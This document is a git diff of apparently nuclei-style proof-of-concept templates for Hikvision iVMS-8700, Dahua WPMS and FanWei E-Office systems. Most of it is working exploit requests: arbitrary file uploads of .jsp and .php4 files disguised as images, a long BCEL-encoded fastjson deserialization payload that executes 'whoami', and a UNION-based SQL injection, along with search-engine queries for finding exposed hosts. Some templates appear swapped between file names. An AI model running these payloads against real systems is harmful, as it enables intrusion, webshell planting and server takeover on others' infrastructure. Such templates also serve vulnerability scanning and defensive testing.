$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}}
+ User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 184
+ Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15
+
+ --c4155aff43901a8b2a19a4641a5efa15
+ Content-Disposition: form-data; name="fileUploader"; filename="test.jsp"
+ Content-Type: image/jpeg
+
+ {{randstr}}
+ --c4155aff43901a8b2a19a4641a5efa15--
+
+ - |
+ GET /eps/upload/{{name}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: json
+ name: name
+ json:
+ - ".data.resourceUuid"
+ internal: true
matchers:
- type: word
words:
- - "nt authority\\system"
+ - '{{randstr}}'
diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
index 7f081b05e0..0ebd67934b 100644
--- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
@@ -1,48 +1,27 @@
id: HIKVISION
info:
- name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file
+ name: HIKVISION
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files
+ There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability
metadata:
- fofa-query: icon_hash="-911494769"
- hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
+ fofa-query: app="HIKVISION-综合安防管理平台"
+ hunter-query: web.title="综合安防管理平台"
-variables:
- str1: '{{rand_base(6)}}'
- str2: '{{rand_base(6)}}'
- str3: '<%out.print("{{str2}}");%>'
-
http:
- raw:
- |
- POST /eps/resourceOperations/upload.action HTTP/1.1
+ POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: {{Hostname}}
- User-Agent: MicroMessenger
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
-
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
- Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
- Content-Type: image/jpeg
-
- {{str3}}
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
-
- - |
- GET /eps/upload/{{res_id}}.jsp HTTP/1.1
- Host: {{Hostname}}
-
- extractors:
- - type: json
- name: res_id
- json:
- - ".data.resourceUuid"
- internal: true
+ Content-Type: application/json
+ Testcmd: whoami
+
+ {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}}
matchers:
- - type: dsl
- dsl:
- - body_2 == str2
+ - type: word
+ words:
+ - "nt authority\\system"
diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml
index fa3aafbfe2..c7afb0444b 100644
--- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml
+++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml
@@ -1,68 +1,50 @@
id: CVE-2023-3836
info:
- name: Dahua Smart Park Management - Arbitrary File Upload
- author: HuTa0
- severity: critical
+ name: 大华-WPMS-upload-addimgico
+ author: hufei
+ severity: high
description: |
- Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
- remediation: |
- Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
+ 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
reference:
- - https://github.com/qiuhuihk/cve/blob/main/upload.md
- - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- - https://vuldb.com/?ctiid.235162
- - https://vuldb.com/?id.235162
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-3836
- cwe-id: CWE-434
- epss-score: 0.03083
- epss-percentile: 0.8997
- cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
+ https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E
metadata:
+ max-request: 1
+ fofa-query: app="大华-智慧园区综合管理平台"
+ hunter-query: app.name="Dahua 大华 智慧园区管理平台"
verified: true
- max-request: 2
- vendor: dahuasecurity
- product: smart_parking_management
- shodan-query: html:"/WPMS/asset"
- zoomeye-query: /WPMS/asset
- tags: cve,cve2023,dahua,fileupload,intrusive,rce
-variables:
- random_str: "{{rand_base(6)}}"
- match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
- Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 177
+ Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
- Content-Type: application/octet-stream
- Content-Transfer-Encoding: binary
+ --e00b34d08d13639f8b619829b04c1a29
+ Content-Disposition: form-data; name="upload"; filename="test.jsp"
+ Content-Type: image/gif
+
+ {{randstr}}
+ --e00b34d08d13639f8b619829b04c1a29--
- {{match_str}}
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
- GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
+ GET /upload/emap/society_new/{{name}} HTTP/1.1
Host: {{Hostname}}
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && status_code_2 == 200"
- - "contains(body_2, '{{match_str}}')"
- condition: and
-
extractors:
- - type: regex
- name: shell_filename
+ - type: json
+ name: name
+ json:
+ - ".data"
internal: true
- part: body_1
- regex:
- - 'ico_res_(\w+)_on\.jsp'
-# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}'
\ No newline at end of file
diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml
index 8c93d2bd55..4e7ede529c 100644
--- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml
+++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml
@@ -1,39 +1,29 @@
id: FanWei
+
info:
- name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability
+ name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability
+ FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information-
metadata:
- fofa-query: app="泛微-EOffice"
- hunter-query: web.title="泛微软件"
+ fofa-query: app="泛微-协同办公OA"
+ hunter-query: web.title="泛微-协同办公OA"
+
http:
- raw:
- |
- POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
+ GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
+ Accept-Encoding: gzip, deflate
Connection: close
- Content-Length: 259
- Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
- Accept-Encoding: gzip
-
- --e64bdf16c554bbc109cecef6451c26a4
- Content-Disposition: form-data; name="Filedata"; filename="test.php"
- Content-Type: image/jpeg
-
-
-
- --e64bdf16c554bbc109cecef6451c26a4--
req-condition: true
matchers:
- type: dsl
dsl:
- - 'status_code_1 == 200 && len(body) > 0'
+ - 'contains(body_1, "c4ca")'
condition: and
-
-# /attachment/3466744850/xxx.php
diff --git a/poc/upload/ecology_E-Office_upload.yaml b/poc/upload/ecology_E-Office_upload.yaml
index 4e7ede529c..aa02a4941d 100644
--- a/poc/upload/ecology_E-Office_upload.yaml
+++ b/poc/upload/ecology_E-Office_upload.yaml
@@ -1,29 +1,52 @@
id: FanWei
-
info:
- name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability
+ name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information-
+ FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability
metadata:
- fofa-query: app="泛微-协同办公OA"
- hunter-query: web.title="泛微-协同办公OA"
+ fofa-query: app="泛微-EOffice"
+ hunter-query: web.title="泛微软件"
+
+variables:
+ str1: '{{rand_base(6)}}'
+ str2: '{{rand_base(6)}}'
http:
- raw:
- |
- GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
- Accept-Encoding: gzip, deflate
- Connection: close
+ POST /webservice/upload.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl
+ Accept-Encoding: gzip
+ Connection: close
+
+ ------WebKitFormBoundaryakbyiukl
+ Content-Disposition: form-data; name="file"; filename="a.php4"
+ Content-Type: application/octet-stream
+
+
+ ------WebKitFormBoundaryakbyiukl--
+
+ - |
+ GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: regex
+ name: name
+ group: 1
+ regex:
+ - '([/*0-9a-zA-Z]+)\.php4$'
+ internal: true
- req-condition: true
matchers:
- type: dsl
dsl:
- - 'contains(body_1, "c4ca")'
- condition: and
+ - body_2 == str2
+
+# http://your-ip/attachment/回显的那串数字/a.php4
diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
index fa3aafbfe2..c7afb0444b 100644
--- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
+++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
@@ -1,68 +1,50 @@
id: CVE-2023-3836
info:
- name: Dahua Smart Park Management - Arbitrary File Upload
- author: HuTa0
- severity: critical
+ name: 大华-WPMS-upload-addimgico
+ author: hufei
+ severity: high
description: |
- Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
- remediation: |
- Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
+ 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
reference:
- - https://github.com/qiuhuihk/cve/blob/main/upload.md
- - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- - https://vuldb.com/?ctiid.235162
- - https://vuldb.com/?id.235162
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-3836
- cwe-id: CWE-434
- epss-score: 0.03083
- epss-percentile: 0.8997
- cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
+ https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E
metadata:
+ max-request: 1
+ fofa-query: app="大华-智慧园区综合管理平台"
+ hunter-query: app.name="Dahua 大华 智慧园区管理平台"
verified: true
- max-request: 2
- vendor: dahuasecurity
- product: smart_parking_management
- shodan-query: html:"/WPMS/asset"
- zoomeye-query: /WPMS/asset
- tags: cve,cve2023,dahua,fileupload,intrusive,rce
-variables:
- random_str: "{{rand_base(6)}}"
- match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
- Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 177
+ Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
- Content-Type: application/octet-stream
